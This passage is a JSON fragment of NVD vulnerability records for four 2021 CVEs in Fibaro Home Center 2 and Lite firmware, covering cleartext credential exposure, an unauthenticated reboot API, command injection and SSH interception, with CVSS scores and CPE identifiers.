tokens and passwords.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-04-19T14:15:00", "type": "cve", "title": "CVE-2021-20992", "cwe": ["CWE-319"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20992"], "modified": "2021-04-23T16:08:00", "cpe": ["cpe:/o:fibaro:home_center_lite_firmware:*", "cpe:/o:fibaro:home_center_2_firmware:*"], "id": "CVE-2021-20992", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-20992", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:fibaro:home_center_lite_firmware:*:*:*:*:*:*:*:*", "cpe:2.3:o:fibaro:home_center_2_firmware:*:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T13:31:41", "description": "In Fibaro Home Center 2 and Lite devices with firmware version 4.600 and older an internal management service is accessible on port 8000 and some API endpoints could be accessed without authentication to trigger a shutdown, a reboot or a reboot into recovery mode.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-04-19T14:15:00", "type": "cve", "title": "CVE-2021-20990", "cwe": ["CWE-863"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20990"], "modified": "2021-04-23T15:34:00", "cpe": ["cpe:/o:fibaro:home_center_2_firmware:4.600", 
"cpe:/o:fibaro:home_center_lite_firmware:4.600"], "id": "CVE-2021-20990", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-20990", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:o:fibaro:home_center_lite_firmware:4.600:*:*:*:*:*:*:*", "cpe:2.3:o:fibaro:home_center_2_firmware:4.600:*:*:*:*:*:*:*"]}, {"lastseen": "2022-04-26T20:10:31", "description": "In Fibaro Home Center 2 and Lite devices with firmware version 4.540 and older an authenticated user can run commands as root user using a command injection vulnerability.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-19T14:15:00", "type": "cve", "title": "CVE-2021-20991", "cwe": ["CWE-77"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20991"], "modified": "2022-04-26T16:03:00", "cpe": ["cpe:/o:fibaro:home_center_lite_firmware:4.540", "cpe:/o:fibaro:home_center_2_firmware:4.540"], "id": "CVE-2021-20991", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-20991", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": 
["cpe:2.3:o:fibaro:home_center_2_firmware:4.540:*:*:*:*:*:*:*", "cpe:2.3:o:fibaro:home_center_lite_firmware:4.540:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T13:31:40", "description": "Fibaro Home Center 2 and Lite devices with firmware version 4.600 and older initiate SSH connections to the Fibaro cloud to provide remote access and remote support capabilities. This connection can be intercepted using DNS spoofing attack and a device initiated remote port-forward channel can be used to connect to the web management interface. Knowledge of authorization credentials to the management interface is required to perform any further actions.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-04-19T14:15:00", "type": "cve", "title": "CVE-2021-20989", "cwe": ["CWE-862"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20989"], "modified": "2021-04-23T15:25:00", "cpe": ["cpe:/o:fibaro:home_center_2_firmware:4.600", "cpe:/o:fibaro:home_center_lite_firmware:4.600"], "id": "CVE-2021-20989", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-20989", "cvss": {"score": 4.3, "vector": 
"AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:fibaro:home_center_lite_firmware:4.600:*:*:*:*:*:*:*", "cpe:2.3:o:fibaro:home_center_2_firmware:4.600:*:*:*:*:*:*:*"]}]}